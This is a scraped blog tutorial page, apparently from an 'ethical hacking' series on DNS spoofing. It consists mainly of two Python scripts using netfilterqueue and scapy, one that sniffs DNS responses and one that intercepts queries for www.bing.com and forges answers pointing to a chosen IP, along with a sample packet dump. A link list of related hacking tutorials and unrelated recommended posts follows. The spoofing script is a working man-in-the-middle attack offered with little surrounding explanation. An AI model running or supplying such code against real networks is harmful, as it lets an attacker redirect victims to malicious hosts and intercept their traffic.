What is DNS Spoofing

Sniff the DNSRR packet and show on the terminal.

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue

from scapy.layers.dns import DNSRR,IP

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(DNSRR):

        print(scapy_packet.show())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

Analyze the following DNSRR records.

###[ IP ]###

  version   = 4

  ihl       = 5

  tos       = 0x0

  len       = 218

  id        = 0

  flags     = DF

  frag      = 0

  ttl       = 64

  proto     = udp

  chksum    = 0x25e8

  src       = 10.0.0.1

  dst       = 10.0.0.43

  \options   \

###[ UDP ]###

     sport     = domain

     dport     = 42647

     len       = 198

     chksum    = 0x9388

###[ DNS ]###

        id        = 40073

        qr        = 1

        opcode    = QUERY

        aa        = 0

        tc        = 0

        rd        = 1

        ra        = 1

        z         = 0

        ad        = 0

        cd        = 0

        rcode     = ok

        qdcount   = 1

        ancount   = 3

        nscount   = 1

        arcount   = 0

        \qd        \

         |###[ DNS Question Record ]###

         |  qname     = 'www.bing.com.'

         |  qtype     = AAAA

         |  qclass    = IN

        \an        \

         |###[ DNS Resource Record ]###

         |  rrname    = 'www.bing.com.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 2063

         |  rdlen     = None

         |  rdata     = 'a-0001.a-afdentry.net.trafficmanager.net.'

         |###[ DNS Resource Record ]###

         |  rrname    = 'a-0001.a-afdentry.net.trafficmanager.net.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 414

         |  rdlen     = None

         |  rdata     = 'cn.cn-0001.cn-msedge.net.'

         |###[ DNS Resource Record ]###

         |  rrname    = 'cn.cn-0001.cn-msedge.net.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 38

         |  rdlen     = None

         |  rdata     = 'cn-0001.cn-msedge.net.'

        \ns        \

         |###[ DNS SOA Resource Record ]###

         |  rrname    = 'cn-msedge.net.'

         |  type      = SOA

         |  rclass    = IN

         |  ttl       = 38

         |  rdlen     = None

         |  mname     = 'ns1.cn-msedge.net.'

         |  rname     = 'msnhst.microsoft.com.'

         |  serial    = 2017032701

         |  refresh   = 1800

         |  retry     = 900

         |  expire    = 2419200

         |  minimum   = 240

        ar        = None

Redirecting DNS Responses

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue

from scapy.layers.dns import *

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(DNSQR):

        qname = scapy_packet[DNSQR].qname

        if "www.bing.com" in qname.decode(errors='ignore'):

            print("[+] Spoofing target")

            answer = DNSRR(rrname=qname, rdata="10.0.0.43")

            scapy_packet[DNS].an = answer

            scapy_packet[DNS].ancount = 1

            del scapy_packet[IP].len

            del scapy_packet[IP].chksum

            del scapy_packet[UDP].chksum

            del scapy_packet[UDP].len

            packet.set_payload(str(scapy_packet).encode())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

The set_payload() method does not work....

https://github.com/kti/python-netfilterqueue/issues/30

Python Ethical Hacking - DNS Spoofing的更多相关文章

  1. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  2. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  3. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  4. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  5. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

  6. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  7. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  8. Python Ethical Hacking - MAC Address & How to Change(2)

    FUNCTIONS Set of instructions to carry out a task. Can take input, and return a result. Make the cod ...

  9. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

随机推荐

  1. vue 生成二维码+截图

    链接生成二维码 1.npm安装 npm install --save qrcodejs2 2.引入 import QRCode from 'qrcodejs2' 3.生成二维码 new QRCode( ...

  2. Nginx 如何自定义变量?

    之前的两篇文章 Nginx 变量介绍以及利用 Nginx 变量做防盗链 讲的是 Nginx 有哪些变量以及一个常见的应用.那么如此灵活的 Nginx 怎么能不支持自定义变量呢,今天的文章就来说一下自定 ...

  3. sed 命令使用入门

    上一篇说了 awk 命令的基本使用方法,这一篇就来说说其兄弟 sed 的使用方法吧(传说之中,Linux 命令行下处理文件文件三大上古神器:grep.awk.sed,每一个都很好很强大,有时间了说说 ...

  4. Perl如何安装新模块/包

    今天写Perl程序时需要调用到Tk模块,但是我机器上却没有T T. Perl小白,不知道肿么装新模块.网上搜了一下资料,和大家分享下. 本人机器Windows的系统,没法提供Unix或者Linux的测 ...

  5. npm -v 报错:Error: EPERM: operation not permitted, mkdir 'C:\soft\nodejs'

    npm -v 报错:Error: EPERM: operation not permitted, mkdir 'C:\soft\nodejs' 起因:原本安装node在C盘soft文件夹下,按node ...

  6. SpringMVC和Spring

    SpringMVC和Spring汇总 转载:https://www.cnblogs.com/doudouxiaoye/p/5693399.html 1. 为什么使用Spring ? 1). 方便解耦, ...

  7. Python实用笔记 (13)函数式编程——返回函数

    函数作为返回值 我们来实现一个可变参数的求和.通常情况下,求和的函数是这样定义的: def calc_sum(*args): ax = 0 for n in args: ax = ax + n ret ...

  8. dart快速入门教程 (5)

    5.函数 5.1.函数定义 语法: 返回值类型 函数名(参数类型 参数1, 参数类型 参数2,...) { // 函数体 return '返回值' } 举例: void main() { print( ...

  9. Spring-AliasRegistry

    使用Spring 的时候我们可以很容易的为某个bean 配置一个或多个别名 <bean id="app:dataSource" class="..."&g ...

  10. 使用Spring Cache集成Redis

    SpringBoot 是为了简化 Spring 应用的创建.运行.调试.部署等一系列问题而诞生的产物,自动装配的特性让我们可以更好的关注业务本身而不是外部的XML配置,我们只需遵循规范,引入相关的依赖 ...